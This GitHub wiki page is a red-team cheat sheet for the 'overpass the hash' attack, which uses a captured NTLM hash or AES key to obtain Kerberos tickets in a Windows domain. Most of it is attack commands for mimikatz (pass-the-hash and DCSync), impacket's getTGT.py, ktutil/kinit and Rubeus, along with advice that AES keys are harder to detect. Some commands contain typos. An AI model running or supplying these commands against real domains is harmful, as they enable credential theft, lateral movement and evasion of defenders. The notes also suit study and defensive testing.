Overpass the hash - CraigDonkin/Infrastructure GitHub Wiki
Involves leveraging a captured NTLM hash to obtain a Kerberos TGT for the user. You don't need to be elevated to request the ticket if you have the hash. You leverage the ticket via a pass the ticket attack.
privilege::debug
sekurlsa::pth /User:Username /domain:domain /ntlm::hash
-
The hash is injected into the provider msv1_0 and kerberos to answer the NTLM challenges and get a TGT
-
The NTLM hash was passed into kerberos using RC4 encryption
- Microsoft allows you to create RC4-HMAC-MD5 encrypted kerberos tokens based on the NTLM hash
-
Can just use AES key if necessary
- First get the AES key
- Then use this for PTH
- This will be more difficult to detect
lsadup::dcsync /user:user /domain:domain
sekurlsa::pth /user:username /domain:domain /ntlm:hash /aes256:aeskey
./getTGT.py -hashes hash host chmod 600 tgwynn.cache
with aes key:
./getTGT.py -aeskey key host
ktutil -k mykeys add -p user@domain -e arcfour-hma-md5 -w hash --hex -V 5
kinit -t mykeys user@domain
klist
Rubeus.exe asktgt /user:<username> /ntlm:<ntlm hash> /nowrap
If you want a TGT encrypted with AES256:
Rubeus.exe asktgt /user:<username> /aes256:<aes256 hash> /nowrap